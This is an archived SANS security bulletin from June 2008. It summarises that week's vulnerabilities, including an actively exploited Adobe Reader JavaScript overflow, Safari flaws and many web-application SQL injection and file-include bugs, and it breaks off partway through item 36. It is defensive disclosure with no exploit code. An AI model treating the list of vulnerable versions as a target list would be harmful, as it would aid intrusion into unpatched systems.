|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
RISK: The Consensus Security Vulnerability Alert Vol. 7 No. 26
From: The SANS Institute (ConsensusSecurityVulnerabilityAlertsans.org)
Date: Thu Jun 26 2008 - 20:40:10 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
If you were wondering how people's PCs get infected (actually) look no
further than the PDF (Adobe Reader) flaw. PDF documents may get opened
without prompting the user. Then they take over the system. Also two
new remote code execution flaws in Apple Safari.
Alan
*************************************************************************
RISK: The Consensus Security Vulnerability Alert
June 26, 2008 Vol. 7. Week
26
*************************************************************************
RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).
Summary of Updates and Vulnerabilities in this Consensus
Platform Number of Updates and Vulnerabilities
- ------------------------ -------------------------------------
Other Microsoft Products 1
Third Party Windows Apps 4 (#2, #3)
Mac Os 1
Linux 1
BSD 1
Unix 1
Cross Platform 17 (#1, #4)
Web Application - Cross Site Scripting 16
Web Application - SQL Injection 39
Web Application 48
*************************************************************************
TRAINING SCHEDULE UPDATE
- - SANSFIRE 2008 in Washington DC (7/22-7/31) SANS' biggest summer program
http://www.sans.org/sansfire08/
- - Canberra (6/30-7/5) http://www.sans.org/canberra08/
- - Singapore (6/30-7/5) http://www.sans.org/singapore08/
- - Boston (8/9-8/17) http://www.sans.org/boston08/
- - Virginia Beach (8/21-8/29) http://www.sans.org/vabeach08/
Plus 100 other cites and on line any time: www.sans.org
*************************************************************************
Table Of Contents
Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)
Widely Deployed Software
(1) CRITICAL: Adobe Acrobat JavaScript Remote Code Execution
(2) HIGH: Apple Safari Multiple Vulnerabilities
(3) HIGH: IBM AFP Viewer Plugin Buffer Overflow
(4) MODERATE: Ruby Multiple Vulnerabilities
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from
Qualys (www.qualys.com)
-- Other Microsoft Products
08.26.1 - Microsoft Visual Basic Enterprise Edition 6 "vb6skit.dll" Remote Buffer Overflow
-- Third Party Windows Apps
08.26.2 - UltraEdit FTP/SFTP "LIST" Command Directory Traversal
08.26.3 - WISE-FTP FTP Client "LIST" Command Directory Traversal
08.26.4 - World in Conflict NULL Pointer Remote Denial of Service
08.26.5 - SunAge Multiple Denial of Service Vulnerabilities
-- Mac Os
08.26.6 - Apple Mac OS X AppleScript ARDAgent Shell Local Privilege Escalation
-- Linux
08.26.7 - Red Hat SBLIM Insecure Library Path Local Privilege Escalation
-- BSD
08.26.8 - OpenBSD GNU Screen Locked Authentication Bypass
-- Unix
08.26.9 - TMSNC UBX Message Remote Buffer Overflow
-- Cross Platform
08.26.10 - SurgeMail IMAP Command Unspecified Denial of Service
08.26.11 - OFFSystem HTTP Headers Remote Buffer Overflow
08.26.12 - Cisco Intrustion Prevention System (IPS) Platforms Inline Mode Denial of Service
08.26.13 - Mozilla Firefox 3 Unspecified Buffer Overflow
08.26.14 - PHP "chdir()" and "ftok()" "safe_mode" Multiple Security Bypass Vulnerabilities
08.26.15 - PHP 5 "posix_access()" Function "safe_mode" Bypass Directory Traversal Vulnerability
08.26.16 - Mozilla Firefox Unspecified Remote Code Execution
08.26.17 - PHP "rfc822_write_address()" Function Buffer Overflow
08.26.18 - Apple Safari Automatic File Launch Remote Code Execution
08.26.19 - Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow
08.26.20 - Classic FTP "LIST" Command Directory Traversal
08.26.21 - Multiple XnView Products TAAC File Buffer Overflow
08.26.22 - JSCAPE Secure FTP Applet Host Key Validation Security Bypass
08.26.23 - Perl "rmtree()" Function Local Insecure Permissions
08.26.24 - Ruby Multiple Unspecified Arbitrary Code Execution Vulnerabilities
08.26.25 - Mozilla Firefox Unspecified Arbitrary File Access Weakness
08.26.26 - Adobe Acrobat and Reader "JavaScript" Method Remote Code Execution
-- Web Application - Cross Site Scripting
08.26.27 - CGIWrap Error Page Handling Cross-Site Scripting
08.26.28 - TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting
08.26.29 - vBulletin Moderation Control Panel "redirect" Parameter Cross-Site Scripting
08.26.30 - Novell eDirectory iMonitor Unspecified Cross-Site Scripting
08.26.31 - Traindepot Local File Include and Cross-Site Scripting Vulnerabilities
08.26.32 - TYPO3 JobControl Extension Unspecified Cross-Site Scripting
08.26.33 - MindTouch DekiWiki Search Cross-Site Scripting
08.26.34 - TYPO3 Resource Library Extension Unspecified Cross-Site Scripting
08.26.35 - GL-SH Deaf Forum Cross-Site Scripting Vulnerability and Arbitrary File Upload
08.26.36 - JaxUltraBB Cross-Site Scripting and Local File Include Vulnerabilities
08.26.37 - PEGames Multiple Cross-Site Scripting Vulnerabilities
08.26.38 - Chipmunk Blog "membername" Parameter Multiple Cross-Site Scripting Vulnerabilities
08.26.39 - HTML Purifier CSS Multiple Cross-Site Scripting Vulnerabilities
08.26.40 - Trabajando Multiple Cross-Site Scripting Vulnerabilities
08.26.41 - TinX/cms Cross-Site Scripting and Local File Include Vulnerabilities
08.26.42 - MM Chat Remote File Include and Multiple Cross-Site Scripting Vulnerabilities
-- Web Application - SQL Injection
08.26.43 - Easy Webstore "index.php" SQL Injection
08.26.44 - KEIL Software photokorn "index.php" SQL Injection
08.26.45 - Samart-cms "site.php" SQL Injection
08.26.46 - CMS-BRD "index.php" SQL Injection
08.26.47 - TYPO3 Diocese of Portsmouth Calendar Today Extension SQL Injection
08.26.48 - TYPO3 CoolURI Extension SQL Injection
08.26.49 - TYPO3 Diocese of Portsmouth Training Courses Extension SQL Injection
08.26.50 - TYPO3 TIMTAB - Social Bookmark Icons Extension SQL Injection
08.26.51 - TYPO3 Fussballtippspiel Extension SQL Injection
08.26.52 - TYPO3 Download System Extension SQL Injection
08.26.53 - TYPO3 Random Prayer Extension SQL Injection
08.26.54 - EroCMS "site" parameter SQL Injection
08.26.55 - TorrentTrader Classic Edition Multiple SQL Injection Vulnerabilities
08.26.56 - MyBizz-Classifieds "index.php" SQL Injection
08.26.57 - MaxTrade Trade Module SQL Injection
08.26.58 - BoatScripts Classifieds "type" Parameter SQL Injection
08.26.59 - Carscripts Classifieds "index.php" SQL Injection
08.26.60 - CaupoShop "csc_article_details.php" SQL Injection
08.26.61 - AJ Auction Pro "cate_id" Parameter SQL Injection
08.26.62 - AJ Auction "id" Parameter SQL Injection
08.26.63 - CiBlog "links-extern.php" SQL Injection
08.26.64 - emuCMS "index.php" SQL Injection
08.26.65 - PHPAuction "profile.php" SQL Injection
08.26.66 - Ektron CMS400.NET "ContentRatingGraph.aspx" SQL Injection
08.26.67 - CMS Multiple SQL Injection Vulnerabilities
08.26.68 - KbLance.com "index.php" SQL Injection
08.26.69 - Online Fantasy Football League Multiple SQL Injection Vulnerabilities
08.26.70 - Scientific Image DataBase "projects.php" SQL Injection
08.26.71 - AJ HYIP Acme "news.php" SQL Injection
08.26.72 - phpAuction "item.php" SQL Injection
08.26.73 - EXP Shop Joomla! "com_expshop" Component SQL Injection
08.26.74 - PageSquid CMS "index.php" SQL Injection
08.26.75 - sHibby sHop "default.asp" SQL Injection
08.26.76 - CCleague Pro "u" Cookie Parameter SQL Injection
08.26.77 - IGSuite "formid" Parameter SQL Injection
08.26.78 - HoMaP-CMS "index.php" SQL Injection
08.26.79 - Relative Real Estate Systems "listing_id" Parameter SQL Injection
08.26.80 - ShareCMS Multiple SQL Injection Vulnerabilities
08.26.81 - DUcalendar "detail.asp" SQL Injection
-- Web Application
08.26.82 - nweb2fax Multiple Remote Vulnerabilities
08.26.83 - Drupal TrailScout Module SQL Injection and HTML Injection Vulnerabilities
08.26.84 - eLineStudio Site Composer Multiple Input Validation and Unauthorized Access Vulnerabilities
08.26.85 - Academic Web Tools CMS 1.4.2.8 Multiple Input Validation Vulnerabilities
08.26.86 - OwnRS "clanek.php" Multiple Input Validation Vulnerabilities
08.26.87 - Orlando CMS classes "GLOBALS["preloc"]" Parameter Multiple Remote File Include Vulnerabilities
08.26.88 - TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified Input Validation Vulnerabilities
08.26.89 - WebCalendar "tools/send_reminders.php" Remote File Include
08.26.90 - ManageEngine OpUtils "hostName" HTML Injection
08.26.91 - CRE Loaded Multiple HTML Injection Vulnerabilities
08.26.92 - Exero CMS "theme" Parameter Multiple Local File Include Vulnerabilities
08.26.93 - doITlive CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
08.26.94 - aspWebCalendar "calendar_admin.asp" Arbitrary File Upload
08.26.95 - TYPO3 nepa-design.de Spam Protection Extension Unspecified Setting Manipulation
08.26.96 - TYPO3 Frontend Filemanager Extension Unspecified Code Execution
08.26.97 - Lotus Core CMS "phpbb_root_path" Parameter Multiple Remote File Include Vulnerabilities
08.26.98 - EZTechhelp Company EZCMS Multiple Unspecified Vulnerabilities
08.26.99 - Virtual Support Office-XP Multiple Remote Vulnerabilities
08.26.100 - FireAnt "index.php" Local File Include
08.26.101 - IPTBB "act" Parameter Local File Include
08.26.102 - FubarForum "index.php" Local File Include
08.26.103 - Lightweight News Portal Multiple Input Validation and Authentication Bypass Vulnerabilities
08.26.104 - Diigo Toolbar and Diigolet Comment Feature HTML Injection and Information Disclosure Vulnerabilities
08.26.105 - Jamroom "purchase.php" Remote File Include
08.26.106 - Aprox CMS Engine "index.php" Local File Include
08.26.107 - IDMOS "site_absolute_path" Parameter Multiple Remote File Include Vulnerabilities
08.26.108 - le.cms "admin/upload.php" Arbitrary File Upload
08.26.109 - CCleague Pro "type" Cookie Parameter Authentication Bypass
08.26.110 - le.cms "submit0" Parameter Authentication Bypass
08.26.111 - RSS-aggregator "display.php" Remote File Include
08.26.112 - MiGCMS Multiple Remote File Include Vulnerabilities
08.26.113 - HoMaP "plugin_admin.php" Remote File Include
08.26.114 - phpDMCA Multiple Remote File Include Vulnerabilities
08.26.115 - Open Digital Assets Repository System Remote File Include
08.26.116 - benja CMS Multiple Input Validation and Unauthorized Access Vulnerabilities
08.26.117 - J00lean-CMS "includes/classes/page.php" Unspecified Remote Vulnerability
08.26.118 - CMS Mini "view/index.php" Multiple Local File Include Vulnerabilities
08.26.119 - CMReams Cross-Site Scripting and Local File Include Vulnerabilities
08.26.120 - emuCMS "upload.php" Arbitrary File Upload
08.26.121 - BlogPHP "email" Parameter Privilege Escalation
08.26.122 - MyBlog Cross-Site Scripting and SQL Injection Vulnerabilities
08.26.123 - Joomla! and Mambo FacileForms Component "ff_compath" Parameter Remote File Include
08.26.124 - Dagger "skins/default.php" Remote File Include
08.26.125 - Ourvideo CMS Multiple Input Validation Vulnerabilities
08.26.126 - cmsWorks "lib.module.php" Remote File Include
08.26.127 - cmsWorks "config.php" Arbitrary File Upload
08.26.128 - A+ PHP Scripts News Management System Multiple Input Validation Vulnerabilities
08.26.129 - Php F1 Max's Image Uploader "index.php" Arbitrary File Upload
______________________________________________________________________
PART I Critical Vulnerabilities
Part I for this issue has been compiled by Rob King at TippingPoint, a
division of 3Com, as a by-product of that company's continuous effort
to ensure that its intrusion prevention products effectively block
exploits using known vulnerabilities. TippingPoint's analysis is
complemented by input from a council of security managers from twelve
large organizations who confidentially share with SANS the specific
actions they have taken to protect their systems. A detailed description
of the process may be found at
http://www.sans.org/newsletters/cva/#process
*****************************
Widely Deployed Software
*****************************
(1) CRITICAL: Adobe Acrobat JavaScript Remote Code Execution
Affected:
Adobe Reader versions 8.1.2 and prior
Adobe Acrobat versions 8.1.2 and prior
Description: Acrobat and Reader are Adobe's Portable Document Format
(PDF) viewers. They contain a flaw in their handling of certain
JavaScript constructs. A PDF document containing embedded JavaScript
could trigger this flaw, creating a buffer overflow condition.
Successfully exploiting this buffer overflow would allow an attacker to
execute arbitrary code with the privileges of the current user. Note
that, depending upon configuration, PDF documents may be opened by the
vulnerable applications upon receipt without first prompting the user.
Reports indicate that this vulnerability is being actively exploited in
the wild.
Status: Vendor confirmed, updates available.
References:
Adobe Security Advisory
http://www.adobe.com/support/security/bulletins/apsb08-15.html
Wikipedia Article on the Portable Document Format
http://en.wikipedia.org/wiki/Portable_Document_Format
SecurityFocus BID
http://www.securityfocus.com/bid/29908
**************************************************
(2) HIGH: Apple Safari Multiple Vulnerabilities
Affected:
Apple Safari 3.1.1 and prior for Microsoft Windows.
Description: Safari, Apple's web browser for Mac OS X and Microsoft
Windows contains multiple vulnerabilities in its handling of a variety
of inputs. Two vulnerabilities can result in remote code execution. The
first of these has to do with a logic flaw in Safari's handling of user
preferences. Safari reads part of its configuration from Microsoft
Internet Explorer's configuration; certain combinations of these
settings can result in automatic execution of downloaded files. Note
that Safari is not vulnerable in the default configuration for sites not
in Internet Explorer's "Local" zone. Additionally, a buffer overflow
exists in Safari's handling of JavaScript arrays. A specially crafted
JavaScript script could trigger this overflow, allowing an attacker to
execute arbitrary code with the privileges of the current user. Note
that technical details of this vulnerability may be publicly available
via source code analysis.
Status: Vendor confirmed, updates available. Note that only Safari for
Microsoft Windows is affected.
References:
US-CERT Vulnerability Note
http://www.kb.cert.org/vuls/id/127185
Safari Home Page
http://www.apple.com/safari/
SecurityFocus BIDs
http://www.securityfocus.com/bid/29835
http://www.securityfocus.com/bid/29836
**************************************************
(3) HIGH: IBM AFP Viewer Plugin Buffer Overflow
Affected:
IBM AFP Viewer Plugin versions prior to 3.4.1.7
Description: Advanced Function Presentation (AFP) is a document
presentation system. It is widely used with IBM products. The AFP Viewer
Plugin allows users to view AFP documents from a web browser. This
plugin contains a buffer overflow vulnerability in its handling of
certain inputs. A specially crafted web page that uses this plugin could
trigger this vulnerability. Successfully exploiting this vulnerability
would allow an attacker to execute arbitrary code with the privileges
of the current user. Technical details for this vulnerability are
publicly available.
Status: Vendor confirmed, updates available.
References:
Secunia Security Advisory
http://secunia.com/advisories/27995/
Product Download Page
http://www-1.ibm.com/support/docview.wss?rs=95&context=SRNPPZ&q=psd1*&uid=psd1P4000233
Wikipedia Article on AFP
http://en.wikipedia.org/wiki/Advanced_Function_Presentation
SecurityFocus BID
http://www.securityfocus.com/bid/29932
**************************************************
(4) MODERATE: Ruby Multiple Vulnerabilities
Affected:
Ruby versions 1.8.7-p21 and prior
Description: Ruby is a popular scripting and programming language. It
contains multiple flaws in certain functions. If these functions are
used to process user input, an attacker could trigger one of these
flaws. Successfully exploiting one of these flaws would allow an
attacker to execute arbitrary code with the privileges of the vulnerable
process. Note that technical details for these vulnerabilities is
available via source code analysis.
Status: Vendor confirmed, updates available.
References:
Ruby Security Advisory
http://www.ruby-lang.org/en/news/2008/06/20/arbitrary-code-execution-vulnerabilities/
Ruby Home Page
http://www.ruby-lang.org/en/
SecurityFocus BID
http://www.securityfocus.com/bid/29903
**********************************************************
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 26, 2008
This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 5549 unique vulnerabilities. For this special
SANS community listing, Qualys also includes vulnerabilities that cannot
be scanned remotely.
______________________________________________________________________
08.26.1 CVE: Not Available
Platform: Other Microsoft Products
Title: Microsoft Visual Basic Enterprise Edition 6 "vb6skit.dll"
Remote Buffer Overflow
Description: Microsoft Visual Basic Enterprise Edition 6 is a
development platform for building applications for Microsoft Windows
operating systems. The application is exposed to a stack-based buffer
overflow issue because it fails to perform adequate size checks on
user-supplied input. Microsoft Visual Basic Enterprise Edition 6 SP6
is affected.
Ref: http://www.securityfocus.com/bid/29792
______________________________________________________________________
08.26.2 CVE: Not Available
Platform: Third Party Windows Apps
Title: UltraEdit FTP/SFTP "LIST" Command Directory Traversal
Description: UltraEdit is a text, HTML and HEX editor available for
Microsoft Windows. The application contains an FTP/SFTP browser. The
application is exposed to a directory traversal issue because it fails
to sufficiently sanitize user-supplied input. This issue occurs in the
FTP/SFTP client. Specifically, the application fails to sanitize
directory-traversal strings included in the "LIST" command. UltraEdit
version 14.00b is affected.
Ref: http://vuln.sg/ultraedit1400b-en.html
______________________________________________________________________
08.26.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: WISE-FTP FTP Client "LIST" Command Directory Traversal
Description: WISE-FTP is a FTP client application for Microsoft
Windows. The application is exposed to a directory traversal issue
because it fails to sufficiently sanitize user-supplied input. This
issue occurs in the FTP client. WISE-FTP versions prior to 5.5.9 are
affected.
Ref: http://vuln.sg/wiseftp558-en.html
______________________________________________________________________
08.26.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: World in Conflict NULL Pointer Remote Denial of Service
Description: World in Conflict is a realtime strategy (RTS) game
available for Microsoft Windows. The application is exposed to a
remote denial of service issue because it fails to handle NULL-pointer
exceptions. World in Conflict version 1.008 is affected.
Ref: http://www.securityfocus.com/archive/1/493596
______________________________________________________________________
08.26.5 CVE: Not Available
Platform: Third Party Windows Apps
Title: SunAge Multiple Denial of Service Vulnerabilities
Description: SunAge is a real-time strategy game available for
Microsoft Windows systems. The application is exposed to
multiple denial of service issues. SunAge version 1.08.1 is affected.
Ref: http://aluigi.altervista.org/adv/sunagex-adv.txt
______________________________________________________________________
08.26.6 CVE: Not Available
Platform: Mac Os
Title: Apple Mac OS X AppleScript ARDAgent Shell Local Privilege
Escalation
Description: Mac OS X is exposed to a local privilege escalation issue
affecting ARDAgent (Apple Remote Desktop). ARDAgent is installed
setuid. When an AppleScript script is used to invoke ARDAgent, the
ARDAgent process does not drop privileges. Mac OS X version 10.5 is
affected.
Ref: http://it.slashdot.org/it/08/06/18/1919224.shtml
______________________________________________________________________
08.26.7 CVE: CVE-2008-1951
Platform: Linux
Title: Red Hat SBLIM Insecure Library Path Local Privilege Escalation
Description: SBLIM is an Open Source project, intended to enhance the
manageability of GNU/Linux systems. The application is exposed to a
local privilege escalation issue because they were built with insecure
library search paths. Certain libraries RPATH (runtime library search
path) in the ELF (Executable and Linking Format) header point to a
world-writeable temporary directory.
Ref: https://rhn.redhat.com/errata/RHSA-2008-0497.html
______________________________________________________________________
08.26.8 CVE: Not Available
Platform: BSD
Title: OpenBSD GNU Screen Locked Authentication Bypass
Description: GNU Screen is a window manager that allows users to
create and use multiple virtual consoles on one physical terminal. GNU
Screen for OpenBSD is exposed to an issue that allows local attackers
to bypass the locked screen password prompt. GNU Screen version 4.0.3
for OpenBSD 4.3 is affected.
Ref: http://www.securityfocus.com/bid/29810
______________________________________________________________________
08.26.9 CVE: Not Available
Platform: Unix
Title: TMSNC UBX Message Remote Buffer Overflow
Description: TMSNC is a command-line, text-only MSN messenger client
application available for Unix and Unix-like systems. The
application is exposed to a buffer overflow issue because it fails to
perform adequate boundary checks on user-supplied input. TMSNC version
0.3.2 is affected.
Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487222
______________________________________________________________________
08.26.10 CVE: Not Available
Platform: Cross Platform
Title: SurgeMail IMAP Command Unspecified Denial of Service
Description: SurgeMail is a mail server available for various
platforms. The application is exposed to a remote denial of service
issue due to an unspecified error when handling certain IMAP commands.
SurgeMail versions prior to 3.9g2 are affected.
Ref: http://www.netwinsite.com/surgemail/help/updates.htm
______________________________________________________________________
08.26.11 CVE: Not Available
Platform: Cross Platform
Title: OFFSystem HTTP Headers Remote Buffer Overflow
Description: Owner-Free Filesystem is a distributed file system. The
application is exposed to a buffer overflow issue because it fails to
perform adequate boundary checks on user-supplied data. The issue
occurs when parsing HTTP headers. OFFSystem versions up to 0.19.14 are
affected.
Ref: http://www.securityfocus.com/bid/29809
______________________________________________________________________
08.26.12 CVE: CVE-2008-2060
Platform: Cross Platform
Title: Cisco Intrustion Prevention System (IPS) Platforms Inline Mode
Denial of Service
Description: Cisco Intrustion Prevention System (IPS) platforms are
designed to monitor network traffic for malicious activity and to
mitigate possible attacks. The application is exposed to a denial of
service issue when handling a specific series of jumbo ethernet
frames. Cisco Intrustion Prevention System versions prior to 5.1(8)E2
and 6.0(5)E2 are affected.
Ref:
http://www.cisco.com/en/US/products/products_security_advisory09186a00809b3842.shtml
______________________________________________________________________
08.26.13 CVE: CVE-2008-2786
Platform: Cross Platform
Title: Mozilla Firefox 3 Unspecified Buffer Overflow
Description: Mozilla Firefox is a web browser available for multiple
platforms. The application is exposed to an unspecified buffer
overflow issue. An attacker can exploit this issue to execute
arbitrary code within the context of the affected application.
Ref:
http://lists.grok.org.uk/pipermail/full-disclosure/2008-June/062832.html
______________________________________________________________________
08.26.14 CVE: CVE-2008-2666
Platform: Cross Platform
Title: PHP "chdir()" and "ftok()" "safe_mode" Multiple Security Bypass
Vulnerabilities
Description: PHP is a general-purpose scripting language that is
especially suited for web development and can be embedded into HTML.
PHP is exposed to multiple "safe_mode" restriction bypass issues. PHP
version 5.2.6 is affected.
Ref: http://securityreason.com/achievement_securityalert/55
______________________________________________________________________
08.26.15 CVE: CVE-2008-2665
Platform: Cross Platform
Title: PHP 5 "posix_access()" Function "safe_mode" Bypass Directory
Traversal Vulnerability
Description: PHP is a general-purpose scripting language that is
especially suited for web development and can be embedded into HTML.
The application is exposed to a directory traversal issue that affects
the "posix_access()" function. PHP version 5.2.6 is affected.
Ref: http://securityreason.com/achievement_securityalert/54
______________________________________________________________________
08.26.16 CVE: CVE-2008-2785
Platform: Cross Platform
Title: Mozilla Firefox Unspecified Remote Code Execution
Description: Mozilla Firefox is a web browser available for multiple
platforms. The application is exposed to an unspecified remote code
execution issue. Mozilla Firefox versions 3.0 and earlier are
affected.
Ref:
http://dvlabs.tippingpoint.com/blog/2008/06/18/vulnerability-in-mozilla-firefox-30
______________________________________________________________________
08.26.17 CVE: Not Available
Platform: Cross Platform
Title: PHP "rfc822_write_address()" Function Buffer Overflow
Description: PHP is a general-purpose scripting language that is
especially suited for web development and can be embedded into HTML.
The application is exposed to a buffer overflow issue because it fails
to perform boundary checks before copying user-supplied data to
insufficiently sized memory buffers. PHP versions 5.2.6 and earlier
are affected.
Ref: http://bugs.php.net/bug.php?id=42862
______________________________________________________________________
08.26.18 CVE: CVE-2008-2306
Platform: Cross Platform
Title: Apple Safari Automatic File Launch Remote Code Execution
Description: Apple Safari is web browser available for Apple Mac OS X
and Microsoft Windows. The application is exposed to a remote code
execution issue because the application automatically launches
executable files when downloading from a web site. Apple Safari
versions prior to 3.1.2 running on Microsoft Windows XP and Windows
Vista are affected.
Ref: http://www.kb.cert.org/vuls/id/127185
______________________________________________________________________
08.26.19 CVE: CVE-2008-2307
Platform: Cross Platform
Title: Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow
Description: WebKit is a browser framework used in the Apple Safari
browser and other applications. The application is exposed to a remote
buffer overflow issue because it fails to perform adequate boundary
checks when handling specially crafted JavaScript arrays.
Ref: http://www.securityfocus.com/bid/29836
______________________________________________________________________
08.26.20 CVE: Not Available
Platform: Cross Platform
Title: Classic FTP "LIST" Command Directory Traversal
Description: Classic FTP is a FTP client application for multiple
operating systems. The application is exposed to a directory traversal
issue because it fails to sufficiently sanitize user-supplied input.
This issue occurs in the FTP client. Classic FTP version 1.02 for
Microsoft Windows is affected.
Ref: http://vuln.sg/classicftp102-en.html
______________________________________________________________________
08.26.21 CVE: CVE-2008-2427
Platform: Cross Platform
Title: Multiple XnView Products TAAC File Buffer Overflow
Description: XnView is an image viewing and converting application;
NConvert is a batch image file conversion application; GFL SDK is an
imaging library designed to read and write numerous image file formats.
The applications are exposed to a buffer overflow issue due to
insufficient boundary checking of user-supplied input in malicious image
files. Affected applications are: XnView Standard versions 1.70 and
1.93.6, XnView NConvert version 4.92, and XnView GFL SDK version 2.82.
Ref: http://www.securityfocus.com/archive/1/493505
______________________________________________________________________
08.26.22 CVE: Not Available
Platform: Cross Platform
Title: JSCAPE Secure FTP Applet Host Key Validation Security Bypass
Description: JSCAPE Secure FTP Applet is a secure ftp client. It runs
as a Java applet in a browser. The application is exposed to a
security bypass issue that occurs because the application fails to
properly validate the host key when securely connecting to a server.
JSCAPE Secure FTP Applet versions prior to 4.9.0 are affected.
Ref: http://www.securityfocus.com/bid/29882
______________________________________________________________________
08.26.23 CVE: Not Available
Platform: Cross Platform
Title: Perl "rmtree()" Function Local Insecure Permissions
Description: Perl is a multi-platform programming language. Computers
running Perl are exposed to a local issue that occurs when handling
symbolic links. Perl version 5.10.0 is affected.
Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487319
______________________________________________________________________
08.26.24 CVE: CVE-2008-2662, CVE-2008-2663, CVE-2008-2725,
CVE-2008-2726, CVE-2008-2664
Platform: Cross Platform
Title: Ruby Multiple Unspecified Arbitrary Code Execution
Vulnerabilities
Description: Ruby is exposed to multiple unspecified arbitrary code
execution issues. Kindly refer to the link below for further details.
Ref:
http://www.ruby-lang.org/en/news/2008/06/20/arbitrary-code-execution-vulnerabilities/
______________________________________________________________________
08.26.25 CVE: Not Available
Platform: Cross Platform
Title: Mozilla Firefox Unspecified Arbitrary File Access Weakness
Description: Mozilla Firefox is a web browser application available
for various operating systems. The application is exposed to a
weakness that may allow attackers to gain access to arbitrary files.
Ref: http://xs-sniper.com/blog/
______________________________________________________________________
08.26.26 CVE: CVE-2008-2641
Platform: Cross Platform
Title: Adobe Acrobat and Reader "JavaScript" Method Remote Code
Execution
Description: The Adobe Acrobat and Reader package are PDF file readers
available for multiple platforms. The application is exposed to a
remote code execution issue because the application fails to
sufficiently sanitize user-supplied input.
Ref: http://www.adobe.com/support/security/bulletins/apsb08-15.html
______________________________________________________________________
08.26.27 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: CGIWrap Error Page Handling Cross-Site Scripting
Description: CGIWrap is a gateway program that allows CGI scripts to
execute in a secure manner. CGIWrap is exposed to a cross-site
scripting issue, which occurs because the application generates error
messages without specifying a charset. This issue can be exploited
only on certain browsers like Internet Explorer. CGIWrap versions
prior to 4.1 are affected.
Ref: http://jvn.jp/en/jp/JVN45389864/index.html
______________________________________________________________________
08.26.28 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting
Description: TYPO3 is an application for creating web portals. The DCD
GoogleMap extension facilitates the insertion of Google Maps. The DCD
GoogleMap extension for TYPO3 is exposed to a cross-site scripting
issue because the application fails to properly sanitize user-supplied
input. The DCD GoogleMap extension for TYPO3 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.29 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: vBulletin Moderation Control Panel "redirect" Parameter
Cross-Site Scripting
Description: vBulletin is a PHP-based content manager. The application
is exposed to a cross-site scripting issue that occurs in the MCP
(moderation control panel) because it fails to properly sanitize
user-supplied input to the "redirect" parameter of the
"vB3/modcp/index.php" script. vBulletin versions 3.7.1 PL1 and 3.6.10
PL1 are affected.
Ref: http://www.vbulletin.com/forum/showthread.php?postid=1570307
______________________________________________________________________
08.26.30 CVE: CVE-2008-0925
Platform: Web Application - Cross Site Scripting
Title: Novell eDirectory iMonitor Unspecified Cross-Site Scripting
Description: iMonitor is a web-based management interface used for
eDirectory, a directory server package available for multiple
platforms. The application is exposed to a cross-site scripting issue
because it fails to properly sanitize user-supplied input to
unspecified parameters. The issue affects error messages of the HTTP
stack. Novell eDirectory versions prior to and including 8.8.2 and
8.7.3.9 for Solaris, Linux, and Windows 2000/2003 are affected.
Ref:
http://www.novell.com/support/viewContent.do?externalId=3460217&sliceId=1
______________________________________________________________________
08.26.31 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Traindepot Local File Include and Cross-Site Scripting
Vulnerabilities
Description: Traindepot is a PHP-based application that allows users
to manage their model train collection. The application is exposed to
multiple input validation issues. Traindepot version 0.1 is affected.
Ref: http://www.securityfocus.com/bid/29790
______________________________________________________________________
08.26.32 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TYPO3 JobControl Extension Unspecified Cross-Site Scripting
Description: TYPO3 is an application for creating web portals. The
JobControl extension allows job offers to be posted on TYPO3 web sites.
The JobControl extension for TYPO3 is exposed to a cross-site
scripting issue because the application fails to properly sanitize
user-supplied input. JobControl versions prior to 1.15.1 are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.33 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: MindTouch DekiWiki Search Cross-Site Scripting
Description: MindTouch DekiWiki is a file server and intranet tool.
The application is exposed to a cross-site scripting issue because it
fails to properly sanitize user-supplied input to an unspecified
parameter when performing a search. MindTouch DekiWiki Versions prior
to 8.05.1 are affected.
Ref: http://bugs.developer.mindtouch.com/view.php?id=4200
______________________________________________________________________
08.26.34 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TYPO3 Resource Library Extension Unspecified Cross-Site
Scripting
Description: Resource Library is an extension for the TYPO3 content
manager. The Resource Library extension for TYPO3 is exposed to a
cross-site scripting issue because the application fails to properly
sanitize user-supplied input. Resource Library version 0.10 is
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________
08.26.35 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: GL-SH Deaf Forum Cross-Site Scripting Vulnerability and
Arbitrary File Upload
Description: GL-SH Deaf Forum is a web-based forum application. The
application is exposed to two issues because it fails to sanitize
user-supplied input. A cross-site scripting issue that affects the
"search.php" script, and an arbitrary file upload issue that affects the
"upload.php" script. GL-SH Deaf Forum version 6.5.5 is affected.
Ref: http://www.securityfocus.com/bid/29849
______________________________________________________________________
08.26.36 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: JaxUltraBB Cross-Site Scripting and Local File Include
